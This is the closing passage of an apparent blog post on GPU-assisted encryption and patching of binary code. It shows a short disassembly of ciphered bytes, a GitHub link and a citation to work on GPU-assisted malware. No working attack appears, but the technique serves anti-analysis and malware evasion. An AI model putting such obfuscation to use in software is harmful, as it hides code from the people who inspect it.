8048a3a:    64 23 6e 65     and %fs:0x65(%esi),%ebp
8048a3e:    62 85 ef bc 07 c1   bound  %eax,-0x3ef84311(%ebp)
8048a44:    8c 90 90 90 90 90    mov    %ss,-0x6f6f6f70(%eax)

You can also find my source on GitHub here: https://github.com/mpekatsoula/gpu_ad

I want to develop a stronger cipher and find a better way to patch my binary, so this is just the idea. If someone wants to go deeper, I’d like to hear new ideas. Until then, feel free to comment, point out mistakes, etc.

Sources

[1]: GPU Assisted malware